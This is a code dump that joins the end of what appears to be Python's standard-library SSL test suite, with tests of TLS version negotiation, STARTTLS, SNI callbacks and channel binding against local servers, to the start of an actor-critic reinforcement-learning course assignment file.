try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv23(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1')
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
"OpenSSL is compiled without SSLv3 support")
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, 'SSLv3',
client_options=ssl.OP_NO_SSLv2)
@skip_if_broken_ubuntu_ssl
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
"TLS version 1.1 not supported.")
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
"TLS version 1.2 not supported.")
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using a SocketServer to create and manage SSL connections."""
server = make_https_server(self, certfile=CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=CERTFILE)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
indata = "TEST MESSAGE of mixed case\n"
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = ssl.wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, whether to expect success, *args)
send_methods = [
('send', s.send, True, []),
('sendto', s.sendto, False, ["some.address"]),
('sendall', s.sendall, True, []),
]
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for meth_name, send_meth, expect_success, args in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
send_meth(indata, *args)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, bytearray(100))
s.write(b"over\n")
s.close()
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
ssl.wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = ssl.wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.recv(1)
t = threading.Thread(target=serve)
t.start()
# Client wait until server setup and perform a connect.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_default_ciphers(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
try:
# Force a set of weak ciphers on our client context
context.set_ciphers("DES")
except ssl.SSLError:
self.skipTest("no DES cipher available")
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_SSLv23,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", str(server.conn_errors[0]))
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
s.connect((HOST, server.port))
self.assertEqual(s.version(), "TLSv1")
self.assertIs(s.version(), None)
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.load_cert_chain(CERTFILE)
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got channel binding data: {0!r}\n"
.format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
s.close()
# now, again
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got another channel binding data: {0!r}\n"
.format(new_cb_data))
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
s.close()
def test_compression(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['compression'], None)
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.load_dh_params(DHFILE)
context.set_ciphers("kEDH")
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_npn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_cert_chain(CERTFILE)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, 'localhost')
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, 'localhost')
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertIn("ZeroDivisionError", stderr.getvalue())
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertIn("TypeError", stderr.getvalue())
def test_read_write_after_close_raises_valuerror(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket())
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(support.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(support.unlink, support.TESTFN)
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
with open(support.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_main(verbose=False):
if support.verbose:
plats = {
'Linux': platform.linux_distribution,
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, SVN_PYTHON_ORG_ROOT_CERT, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
tests.append(NetworkedBIOTests)
if _have_threads:
thread_info = support.threading_setup()
if thread_info:
tests.append(ThreadedTests)
try:
support.run_unittest(*tests)
finally:
if _have_threads:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
train_ac_exploration_f18.py
|
"""
Original code from John Schulman for CS294 Deep Reinforcement Learning Spring 2017
Adapted for CS294-112 Fall 2017 by Abhishek Gupta and Joshua Achiam
Adapted for CS294-112 Fall 2018 by Soroush Nasiriany, Sid Reddy, and Greg Kahn
Adapted for CS294-112 Fall 2018 with <3 by Michael Chang, some experiments by Greg Kahn, beta-tested by Sid Reddy
"""
import numpy as np
import tensorflow as tf
import tensorflow_probability as tfp
import gym
import logz
import os
import time
import inspect
from multiprocessing import Process
from exploration import ExemplarExploration, DiscreteExploration, RBFExploration
from density_model import Exemplar, Histogram, RBF
#============================================================================================#
# Utilities
#============================================================================================#
def build_mlp(input_placeholder, output_size, scope, n_layers, size, activation=tf.tanh, output_activation=None):
"""
Builds a feedforward neural network
arguments:
input_placeholder: placeholder variable for the state (batch_size, input_size)
output_size: size of the output layer
scope: variable scope of the network
n_layers: number of hidden layers
size: dimension of the hidden layer
activation: activation of the hidden layers
output_activation: activation of the ouput layers
returns:
output placeholder of the network (the result of a forward pass)
Hint: use tf.layers.dense
"""
output_placeholder = input_placeholder
with tf.variable_scope(scope):
for _ in range(n_layers):
output_placeholder = tf.layers.dense(output_placeholder, size, activation=activation)
output_placeholder = tf.layers.dense(output_placeholder, output_size, activation=output_activation)
return output_placeholder
def pathlength(path):
return len(path["reward"])
def setup_logger(logdir, locals_):
# Configure output directory for logging
logz.configure_output_dir(logdir)
# Log experimental parameters
args = inspect.getargspec(train_AC)[0]
params = {k: locals_[k] if k in locals_ else None for k in args}
logz.save_params(params)
#============================================================================================#
# Actor Critic
#============================================================================================#
class Agent(object):
def __init__(self, computation_graph_args, sample_trajectory_args, estimate_advantage_args):
super(Agent, self).__init__()
self.ob_dim = computation_graph_args['ob_dim']
self.ac_dim = computation_graph_args['ac_dim']
self.discrete = computation_graph_args['discrete']
self.size = computation_graph_args['size']
self.n_layers = computation_graph_args['n_layers']
self.learning_rate = computation_graph_args['learning_rate']
self.num_target_updates = computation_graph_args['num_target_updates']
self.num_grad_steps_per_target_update = computation_graph_args['num_grad_steps_per_target_update']
self.animate = sample_trajectory_args['animate']
self.max_path_length = sample_trajectory_args['max_path_length']
self.min_timesteps_per_batch = sample_trajectory_args['min_timesteps_per_batch']
